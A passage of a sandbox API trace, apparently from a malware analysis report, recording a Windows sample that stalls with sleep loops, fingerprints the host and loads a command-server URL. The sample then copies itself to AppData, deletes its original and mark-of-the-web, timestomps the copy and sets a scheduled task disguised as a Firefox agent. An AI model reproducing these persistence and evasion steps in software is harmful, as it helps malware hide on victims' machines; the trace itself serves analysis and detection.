Sleep (dwMilliseconds=0xa) [0102.329] Sleep (dwMilliseconds=0xa) [0102.345] Sleep (dwMilliseconds=0xa) [0102.361] Sleep (dwMilliseconds=0xa) [0102.376] Sleep (dwMilliseconds=0xa) [0102.393] Sleep (dwMilliseconds=0xa) [0102.407] Sleep (dwMilliseconds=0xa) [0102.454] Sleep (dwMilliseconds=0xa) [0102.477] Sleep (dwMilliseconds=0xa) [0102.485] Sleep (dwMilliseconds=0xa) [0102.502] Sleep (dwMilliseconds=0xa) [0102.516] Sleep (dwMilliseconds=0xa) [0102.532] Sleep (dwMilliseconds=0xa) [0102.547] Sleep (dwMilliseconds=0xa) [0102.563] Sleep (dwMilliseconds=0xa) [0102.579] Sleep (dwMilliseconds=0xa) [0102.613] Sleep (dwMilliseconds=0xa) [0102.647] Sleep (dwMilliseconds=0xa) [0102.657] Sleep (dwMilliseconds=0xa) [0102.675] Sleep (dwMilliseconds=0xa) [0102.688] Sleep (dwMilliseconds=0xa) [0102.720] Sleep (dwMilliseconds=0xa) [0102.735] Sleep (dwMilliseconds=0xa) [0102.750] Sleep (dwMilliseconds=0xa) [0102.797] Sleep (dwMilliseconds=0xa) [0102.816] Sleep (dwMilliseconds=0xa) [0102.829] Sleep (dwMilliseconds=0xa) [0102.844] Sleep (dwMilliseconds=0xa) [0102.860] Sleep (dwMilliseconds=0xa) [0102.875] Sleep (dwMilliseconds=0xa) [0102.891] Sleep (dwMilliseconds=0xa) [0102.906] Sleep (dwMilliseconds=0xa) [0102.922] Sleep (dwMilliseconds=0xa) [0102.970] Sleep (dwMilliseconds=0xa) [0102.988] Sleep (dwMilliseconds=0xa) [0103.000] Sleep (dwMilliseconds=0xa) [0103.015] Sleep (dwMilliseconds=0xa) [0103.034] Sleep (dwMilliseconds=0xa) [0103.047] Sleep (dwMilliseconds=0xa) [0103.067] Sleep (dwMilliseconds=0xa) [0103.078] Sleep (dwMilliseconds=0xa) [0103.094] Sleep (dwMilliseconds=0xa) [0103.140] Sleep (dwMilliseconds=0xa) [0103.156] Sleep (dwMilliseconds=0xa) [0103.172] Sleep (dwMilliseconds=0xa) [0103.188] Sleep (dwMilliseconds=0xa) [0103.203] Sleep (dwMilliseconds=0xa) [0103.219] Sleep (dwMilliseconds=0xa) [0103.234] Sleep (dwMilliseconds=0xa) [0103.250] Sleep (dwMilliseconds=0xa) [0103.297] Sleep (dwMilliseconds=0xa) [0103.312] Sleep (dwMilliseconds=0xa) [0103.328] Sleep (dwMilliseconds=0xa) [0103.343] Sleep (dwMilliseconds=0xa) [0103.359] Sleep (dwMilliseconds=0xa) [0103.374] Sleep (dwMilliseconds=0xa) [0103.390] Sleep (dwMilliseconds=0xa) [0103.406] Sleep (dwMilliseconds=0xa) [0103.453] Sleep (dwMilliseconds=0xa) [0103.468] Sleep (dwMilliseconds=0xa) [0103.484] Sleep (dwMilliseconds=0xa) [0103.501] Sleep (dwMilliseconds=0xa) [0103.515] Sleep (dwMilliseconds=0xa) [0103.530] Sleep (dwMilliseconds=0xa) [0103.546] Sleep (dwMilliseconds=0xa) [0103.562] Sleep (dwMilliseconds=0xa) [0103.609] Sleep (dwMilliseconds=0xa) [0103.626] Sleep (dwMilliseconds=0xa) [0103.639] Sleep (dwMilliseconds=0xa) [0103.655] Sleep (dwMilliseconds=0xa) [0103.671] Sleep (dwMilliseconds=0xa) [0103.686] Sleep (dwMilliseconds=0xa) [0103.731] Sleep (dwMilliseconds=0xa) [0103.733] Sleep (dwMilliseconds=0xa) [0103.782] Sleep (dwMilliseconds=0xa) [0103.797] Sleep (dwMilliseconds=0xa) [0103.811] Sleep (dwMilliseconds=0xa) [0103.827] Sleep (dwMilliseconds=0xa) [0103.842] Sleep (dwMilliseconds=0xa) [0103.858] Sleep (dwMilliseconds=0xa) [0103.874] Sleep (dwMilliseconds=0xa) [0103.889] Sleep (dwMilliseconds=0xa) [0103.905] Sleep (dwMilliseconds=0xa) [0103.953] Sleep (dwMilliseconds=0xa) [0103.967] Sleep (dwMilliseconds=0xa) [0103.983] Sleep (dwMilliseconds=0xa) [0103.998] Sleep (dwMilliseconds=0xa) [0104.014] Sleep (dwMilliseconds=0xa) [0104.030] Sleep (dwMilliseconds=0xa) [0104.048] Sleep (dwMilliseconds=0xa) [0104.062] Sleep (dwMilliseconds=0xa) [0104.108] Sleep (dwMilliseconds=0xa) [0104.138] Sleep (dwMilliseconds=0xa) [0104.139] Sleep (dwMilliseconds=0xa) [0104.154] Sleep (dwMilliseconds=0xa) [0104.179] Sleep (dwMilliseconds=0xa) [0104.186] Sleep (dwMilliseconds=0xa) [0104.201] Sleep (dwMilliseconds=0xa) [0104.218] Sleep (dwMilliseconds=0xa) [0104.232] Sleep (dwMilliseconds=0xa) [0104.280] Sleep (dwMilliseconds=0xa) [0104.295] Sleep (dwMilliseconds=0xa) [0104.310] Sleep (dwMilliseconds=0xa) [0104.326] Sleep (dwMilliseconds=0xa) [0104.342] Sleep (dwMilliseconds=0xa) [0104.358] Sleep (dwMilliseconds=0xa) [0104.373] Sleep (dwMilliseconds=0xa) [0104.389] Sleep (dwMilliseconds=0xa) [0104.435] Sleep (dwMilliseconds=0xa) [0104.458] Sleep (dwMilliseconds=0xa) [0104.466] Sleep (dwMilliseconds=0xa) [0104.482] Sleep (dwMilliseconds=0xa) [0104.498] Sleep (dwMilliseconds=0xa) [0104.513] Sleep (dwMilliseconds=0xa) [0104.529] Sleep (dwMilliseconds=0xa) [0104.545] Sleep (dwMilliseconds=0xa) [0104.560] Sleep (dwMilliseconds=0xa) [0104.607] Sleep (dwMilliseconds=0xa) [0104.622] Sleep (dwMilliseconds=0xa) [0104.639] Sleep (dwMilliseconds=0xa) [0104.654] Sleep (dwMilliseconds=0xa) [0104.677] Sleep (dwMilliseconds=0xa) [0104.685] Sleep (dwMilliseconds=0xa) [0104.718] Sleep (dwMilliseconds=0xa) [0104.763] Sleep (dwMilliseconds=0xa) [0104.786] Sleep (dwMilliseconds=0xa) [0104.794] Sleep (dwMilliseconds=0xa) [0104.833] Sleep (dwMilliseconds=0xa) [0104.841] Sleep (dwMilliseconds=0xa) [0104.856] Sleep (dwMilliseconds=0xa) [0104.872] Sleep (dwMilliseconds=0xa) [0104.888] Sleep (dwMilliseconds=0xa) [0104.937] Sleep (dwMilliseconds=0xa) [0104.986] Sleep (dwMilliseconds=0xa) [0104.998] GetSystemDirectoryA (in: lpBuffer=0x7d6f980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.998] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe") returned="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" [0104.998] RtlGetVersion (in: lpVersionInformation=0x27a0457 | out: lpVersionInformation=0x27a0457*(dwOSVersionInfoSize=0x0, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 0x0 [0104.999] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x7d6f968 | out: TokenHandle=0x7d6f968*=0x48c) returned 1 [0104.999] GetTokenInformation (in: TokenHandle=0x48c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x7d6f960 | out: TokenInformation=0x0, ReturnLength=0x7d6f960) returned 0 [0104.999] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x25) returned 0x7f112f0 [0104.999] GetTokenInformation (in: TokenHandle=0x48c, TokenInformationClass=0x19, TokenInformation=0x7f112f0, TokenInformationLength=0x1c, ReturnLength=0x7d6f960 | out: TokenInformation=0x7f112f0, ReturnLength=0x7d6f960) returned 1 [0104.999] GetSidSubAuthorityCount (pSid=0x7f11300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x7f11301 [0105.000] GetSidSubAuthority (pSid=0x7f11300*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x7f11308 [0105.000] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x25 [0105.000] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0105.000] CloseHandle (hObject=0x48c) returned 1 [0105.000] GetComputerNameA (in: lpBuffer=0x7d6fa30, nSize=0x7d6fa70 | out: lpBuffer="Q9IATRKPRH", nSize=0x7d6fa70) returned 1 [0105.000] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x7d6fa60, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x7d6fa60*=0x8443a5af, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0105.002] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x29) returned 0x7f112f0 [0105.002] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x14) returned 0x7f11330 [0105.002] wsprintfA (in: param_1=0x7f112f0, param_2="%s%08X%08X" | out: param_1="Q9IATRKPRH99FC78698443A5AF") returned 26 [0105.002] CryptAcquireContextA (in: phProv=0x7d6f9b8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x7d6f9b8*=0x3f7f120) returned 1 [0105.006] CryptCreateHash (in: hProv=0x3f7f120, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x7d6f9b0 | out: phHash=0x7d6f9b0) returned 1 [0105.007] lstrlenA (lpString="Q9IATRKPRH99FC78698443A5AF") returned 26 [0105.007] CryptHashData (hHash=0x7044020, pbData=0x7f112f0, dwDataLen=0x1a, dwFlags=0x0) returned 1 [0105.007] CryptGetHashParam (in: hHash=0x7044020, dwParam=0x2, pbData=0x7d6f9c0, pdwDataLen=0x7d6f9f0, dwFlags=0x0 | out: pbData=0x7d6f9c0, pdwDataLen=0x7d6f9f0) returned 1 [0105.007] wsprintfA (in: param_1=0x27a020c, param_2="%02X" | out: param_1="4B") returned 2 [0105.007] wsprintfA (in: param_1=0x27a020e, param_2="%02X" | out: param_1="CD") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0210, param_2="%02X" | out: param_1="65") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0212, param_2="%02X" | out: param_1="9A") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0214, param_2="%02X" | out: param_1="D8") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0216, param_2="%02X" | out: param_1="F3") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0218, param_2="%02X" | out: param_1="47") returned 2 [0105.007] wsprintfA (in: param_1=0x27a021a, param_2="%02X" | out: param_1="B5") returned 2 [0105.007] wsprintfA (in: param_1=0x27a021c, param_2="%02X" | out: param_1="B4") returned 2 [0105.007] wsprintfA (in: param_1=0x27a021e, param_2="%02X" | out: param_1="51") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0220, param_2="%02X" | out: param_1="91") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0222, param_2="%02X" | out: param_1="8C") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0224, param_2="%02X" | out: param_1="D8") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0226, param_2="%02X" | out: param_1="91") returned 2 [0105.007] wsprintfA (in: param_1=0x27a0228, param_2="%02X" | out: param_1="C8") returned 2 [0105.007] wsprintfA (in: param_1=0x27a022a, param_2="%02X" | out: param_1="23") returned 2 [0105.007] CryptDestroyHash (hHash=0x7044020) returned 1 [0105.008] CryptReleaseContext (hProv=0x3f7f120, dwFlags=0x0) returned 1 [0105.008] wsprintfA (in: param_1=0x27a022c, param_2="%08X" | out: param_1="8443A5AF") returned 8 [0105.008] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f11330) returned 0x14 [0105.008] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f11330) returned 1 [0105.008] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x29 [0105.008] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0105.008] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0xe) returned 0x7f112f0 [0105.008] wsprintfA (in: param_1=0x27a0dbe, param_2="%sFF" | out: param_1="4BCD659AD8F347B5B451918CD891C8238443A5AFFF") returned 42 [0105.008] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0xe [0105.008] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0105.008] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="4BCD659AD8F347B5B451918CD891C8238443A5AF") returned 0x48c [0105.009] RtlGetLastWin32Error () returned 0x0 [0105.009] GetTickCount () returned 0x1d4177f [0105.009] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x1008) returned 0x7f112f0 [0105.010] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2e) returned 0x7f12300 [0105.010] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x7d6fa78 | out: phkResult=0x7d6fa78*=0x4f0) returned 0x0 [0105.010] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x14) returned 0x7f12340 [0105.010] RegQueryValueExA (in: hKey=0x4f0, lpValueName="svcVersion", lpReserved=0x0, lpType=0x0, lpData=0x7d6fa00, lpcbData=0x7d6fa60*=0x20 | out: lpType=0x0, lpData=0x7d6fa00*=0x0, lpcbData=0x7d6fa60*=0x20) returned 0x2 [0105.010] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12340) returned 0x14 [0105.010] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12340) returned 1 [0105.010] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x11) returned 0x7f12340 [0105.011] RegQueryValueExA (in: hKey=0x4f0, lpValueName="Version", lpReserved=0x0, lpType=0x0, lpData=0x7d6fa00, lpcbData=0x7d6fa60*=0x20 | out: lpType=0x0, lpData=0x7d6fa00*=0x38, lpcbData=0x7d6fa60*=0xf) returned 0x0 [0105.011] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12340) returned 0x11 [0105.011] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12340) returned 1 [0105.011] lstrlenA (lpString="8.0.7601.17514") returned 14 [0105.011] lstrlenA (lpString=".") returned 1 [0105.011] atoi (_Str="8") returned 8 [0105.011] RegCloseKey (hKey=0x4f0) returned 0x0 [0105.011] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x2e [0105.011] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.012] ObtainUserAgentString (in: dwOption=0x8, pszUAOut=0x7f112f0, cbSize=0x7d6fa60 | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)", cbSize=0x7d6fa60) returned 0x0 [0105.031] lstrlenA (lpString="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 183 [0105.031] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7f112f0, cbMultiByte=184, lpWideCharStr=0x27a0577, cchWideChar=368 | out: lpWideCharStr="Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)") returned 184 [0105.031] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f112f0) returned 0x1008 [0105.031] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f112f0) returned 1 [0105.031] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x1008) returned 0x7f112f0 [0105.031] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x1c) returned 0x7f12300 [0105.031] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x7f112f0, nSize=0x105 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x23 [0105.031] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x1c [0105.032] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.032] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x16) returned 0x7f12300 [0105.032] wsprintfW (in: param_1=0x27a07a6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 42 [0105.032] wsprintfW (in: param_1=0x27a0bb6, param_2="%s\\%hs" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\estugfj") returned 42 [0105.032] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x16 [0105.032] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.032] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x26) returned 0x7f12300 [0105.032] lstrlenA (lpString="http://file-coin-host-12.com/") returned 29 [0105.032] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x7f12300, Length=0x1d) returned 0x57488b3e [0105.032] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x26 [0105.033] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.033] lstrcmpW (lpString1="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned 1 [0105.033] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0 [0105.033] CopyFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), bFailIfExists=0) returned 1 [0105.058] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\toolspab3.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\toolspab3.exe")) returned 1 [0105.065] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x12) returned 0x7f12300 [0105.065] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x2a) returned 0x7f12320 [0105.065] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x408) returned 0x7f12360 [0105.065] wsprintfW (in: param_1=0x7f12360, param_2="%s%s" | out: param_1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier") returned 58 [0105.065] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr:Zone.Identifier" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr:zone.identifier")) returned 0 [0105.065] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12360) returned 0x408 [0105.066] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12360) returned 1 [0105.066] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x12 [0105.066] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.066] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12320) returned 0x2a [0105.066] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12320) returned 1 [0105.066] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x16) returned 0x7f12300 [0105.066] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x210) returned 0x7f12320 [0105.066] GetSystemDirectoryA (in: lpBuffer=0x7f12320, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0105.066] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\" | out: lpString1="C:\\Windows\\system32\\") returned="C:\\Windows\\system32\\" [0105.067] lstrcatA (in: lpString1="C:\\Windows\\system32\\", lpString2="advapi32.dll" | out: lpString1="C:\\Windows\\system32\\advapi32.dll") returned="C:\\Windows\\system32\\advapi32.dll" [0105.067] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", dwFileAttributes=0x6) returned 1 [0105.067] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x4f0 [0105.067] GetFileAttributesExA (in: lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), fInfoLevelId=0x0, lpFileInformation=0x7d6f9d0 | out: lpFileInformation=0x7d6f9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe03daea9, ftCreationTime.dwHighDateTime=0x1ca041b, ftLastAccessTime.dwLowDateTime=0xe03daea9, ftLastAccessTime.dwHighDateTime=0x1ca041b, ftLastWriteTime.dwLowDateTime=0xb36110, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xd6200)) returned 1 [0105.067] SetFileTime (hFile=0x4f0, lpCreationTime=0x7d6f9d4, lpLastAccessTime=0x7d6f9dc, lpLastWriteTime=0x7d6f9e4) returned 1 [0105.067] CloseHandle (hObject=0x4f0) returned 1 [0105.067] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12320) returned 0x210 [0105.068] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12320) returned 1 [0105.068] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12300) returned 0x16 [0105.068] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12300) returned 1 [0105.068] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x418) returned 0x7f12300 [0105.068] lstrcatW (in: lpString1="", lpString2="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr") returned="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" [0105.068] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x212) returned 0x7f12720 [0105.068] GetUserNameW (in: lpBuffer=0x7f12720, pcbBuffer=0x7d6fa10 | out: lpBuffer="kEecfMwgj", pcbBuffer=0x7d6fa10) returned 1 [0105.069] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x7f12940 [0105.069] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x4c) returned 0x7f12a60 [0105.069] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x10d) returned 0x7f12ac0 [0105.069] wsprintfW (in: param_1=0x7f12940, param_2="Firefox Default Browser Agent %hs" | out: param_1="Firefox Default Browser Agent 4BCD659AD8F347B5") returned 46 [0105.069] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12ac0) returned 0x10d [0105.070] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12ac0) returned 1 [0105.070] RtlSizeHeap (HeapHandle=0x7f10000, Flags=0x0, MemoryPointer=0x7f12a60) returned 0x4c [0105.070] RtlFreeHeap (HeapHandle=0x7f10000, Flags=0x0, BaseAddress=0x7f12a60) returned 1 [0105.070] CoCreateInstance (in: rclsid=0x3941010*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x3941000*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0x7d6f8a8 | out: ppv=0x7d6f8a8*=0x10aab0) returned 0x0 [0105.071] TaskScheduler:ITaskService:Connect (This=0x10aab0, serverName=0x7d6f920*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), user=0x7d6f940*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), domain=0x7d6f900*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0), password=0x7d6f980*(varType=0x0, wReserved1=0x27a, wReserved2=0x0, wReserved3=0x0, varVal1=0x3945257, varVal2=0x0)) returned 0x0 [0105.080] TaskScheduler:ITaskService:GetFolder (in: This=0x10aab0, Path="", ppFolder=0x7d6f8c8 | out: ppFolder=0x7d6f8c8*=0x126130) returned 0x0 [0105.082] ITaskFolder:DeleteTask (This=0x126130, Name="Firefox Default Browser Agent 4BCD659AD8F347B5", flags=0) returned 0x80070002 [0105.084] TaskScheduler:ITaskService:NewTask (in: This=0x10aab0, flags=0x0, ppDefinition=0x7d6f9e0 | out: ppDefinition=0x7d6f9e0*=0x12b900) returned 0x0 [0105.084] ITaskDefinition:get_RegistrationInfo (in: This=0x12b900, ppRegistrationInfo=0x7d6f8e0 | out: ppRegistrationInfo=0x7d6f8e0*=0x143c00) returned 0x0 [0105.085] IRegistrationInfo:put_Author (This=0x143c00, Author="kEecfMwgj") returned 0x0 [0105.085] IUnknown:Release (This=0x143c00) returned 0x1 [0105.085] ITaskDefinition:get_Settings (in: This=0x12b900, ppSettings=0x7d6f8b8 | out: ppSettings=0x7d6f8b8*=0x143d30) returned 0x0 [0105.085] ITaskSettings:put_StartWhenAvailable (This=0x143d30, StartWhenAvailable=1) returned 0x0 [0105.085] IUnknown:Release (This=0x143d30) returned 0x1 [0105.085] ITaskDefinition:get_Triggers (in: This=0x12b900, ppTriggers=0x7d6f8c0 | out: ppTriggers=0x7d6f8c0*=0x143cc0) returned 0x0 [0105.085] ITriggerCollection:Create (in: This=0x143cc0, Type=1, ppTrigger=0x7d6f9d0 | out: ppTrigger=0x7d6f9d0*=0x13bab0) returned 0x0 [0105.086] IUnknown:QueryInterface (in: This=0x13bab0, riid=0x3941030*(Data1=0xb45747e0, Data2=0xeba7, Data3=0x4276, Data4=([0]=0x9f, [1]=0x29, [2]=0x85, [3]=0xc5, [4]=0xbb, [5]=0x30, [6]=0x0, [7]=0x6)), ppvObject=0x7d6f8b0 | out: ppvObject=0x7d6f8b0*=0x13bab0) returned 0x0 [0105.086] ITrigger:get_Repetition (in: This=0x13bab0, ppRepeat=0x7d6f8a0 | out: ppRepeat=0x7d6f8a0*=0x12cbc0) returned 0x0 [0105.086] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x14) returned 0x7f12a60 [0105.086] IRepetitionPattern:put_Interval (This=0x12cbc0, Interval="PT10M") returned 0x0 [0105.279] ITrigger:put_Repetition (This=0x13bab0, Repetition=0x12cbc0) returned 0x0 [0105.279] IUnknown:Release (This=0x12cbc0) returned 0x1 [0105.279] RtlAllocateHeap (HeapHandle=0x7f10000, Flags=0x8, Size=0x30) returned 0x7f12a80 [0105.280] ITrigger:put_StartBoundary (This=0x13bab0, StartBoundary="1999-11-30T00:00:00") returned 0x0 [0105.280] IUnknown:Release (This=0x13bab0) returned 0x2 [0105.280] RtlSizeHeap (HeapHandle=0x7f10000, 